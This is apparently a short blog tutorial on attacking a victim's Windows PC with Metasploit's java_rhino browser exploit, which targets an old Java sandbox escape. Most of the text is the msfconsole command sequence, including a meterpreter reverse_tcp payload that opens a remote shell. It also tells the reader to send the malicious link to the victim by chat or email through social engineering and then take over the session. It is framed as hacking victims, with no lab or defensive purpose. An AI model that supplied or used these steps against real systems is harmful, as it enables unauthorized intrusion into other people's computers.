How to Hack Remote Victim PC with java Applet Rhino Script

This module exploits vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects version 7 and version 6 update 27 and earlier, and should work on any browser that supports Java (for example: IE, Firefox, Google Chrome, etc)

Exploit Targets

Operating System: Windows XP, Apple OSX, Linux x86

Java Version: JDK and JRE 7, 6 Update 27 and before Java JSE 6 Update 26


Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/java_rhino

Msf exploit (java_rhino)>set payload windows/meterpreter/reverse_tcp

Msf exploit (java_rhino)>set srvhost (This must be an address on the local machine)

Msf exploit (java_rhino)>set lhost (IP of Local Host)

Msf exploit (java_rhino)>set target 1 (Opreating system of Victim PC)

Msf exploit (java_rhino)>set uripath javarhino (The Url to use for this exploit)

Msf exploit (java_rhino)>exploit

Now an URL you should give to your victim

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID


Leave a Reply

Your email address will not be published. Required fields are marked *